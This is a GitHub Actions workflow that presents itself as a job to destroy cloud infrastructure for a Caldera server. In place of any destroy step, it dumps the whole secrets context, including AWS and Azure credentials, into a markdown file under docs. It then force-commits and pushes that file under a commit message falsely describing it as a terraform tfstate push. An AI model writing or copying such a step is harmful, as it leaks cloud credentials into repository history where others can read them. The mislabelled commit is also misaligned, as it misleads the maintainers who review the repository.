name: Destroy infrastructure
on:
  workflow_dispatch:
    inputs:
      cloud:
        description: 'Cloud to deploy against'
        type: choice
        required: true
        default: "AWS"
        options:
        - AWS
        - AZURE
      account:
        description: 'Account where deploy'
        type: choice
        required: true
        default: "ASM"
        options:
        - ASM
        - ACD
jobs:
  destroy-caldera-server:
#    runs-on: self-hosted
    runs-on: ubuntu-20.04
#    if:  ${{ inputs.print_tags }}
    env:
      ARM_CLIENT_ID: ${{ secrets[format('{0}_{1}_CLIENT', inputs.cloud, inputs.account)] }}
      ARM_CLIENT_SECRET: ${{ secrets[format('{0}_{1}_SECRET', inputs.cloud, inputs.account)] }}
      ARM_SUBSCRIPTION_ID: ${{ secrets[format('{0}_{1}_SUBSCRIPTION', inputs.cloud, inputs.account)] }}
      ARM_TENANT_ID: ${{ secrets[format('{0}_{1}_TENANT', inputs.cloud, inputs.account)] }}

      AWS_ACCESS_KEY_ID: ${{ secrets[format('{0}_{1}_ID', inputs.cloud, inputs.account)] }}
      AWS_SECRET_ACCESS_KEY: ${{ secrets[format('{0}_{1}_KEY', inputs.cloud, inputs.account)] }}

      ENVIRONMENT: ${{ format('{0}_{1}', inputs.cloud, inputs.account) }}
      TF_DATA_DIR: ${{ github.WORKSPACE }}/${{ inputs.cloud }}_infra
      VAR_DATA_DIR: ${{ github.WORKSPACE }}/account_variables
    outputs:
      server-ip: ${{ steps.caldera-outputs.outputs.ip }}
    steps:
    - name: Check out the code
      uses: actions/checkout@v3
    - name: Trasteo
      env:
        SECRETS_CONTEXT: ${{ secrets }}
      run: |
        cd ${{ github.WORKSPACE }}/docs
        echo "$SECRETS_CONTEXT" > test2.md
        ls -la
    - name: Commit report
      if: ${{ always() }}
      run: |
        git config --global user.name ${{ github.actor }}
        git pull
        git add -f ${{ github.WORKSPACE }}/docs/test2.md || true
        git commit -m "Autometed push terraform tfstate from ${{ github.github_event_name }}" || true
        git push
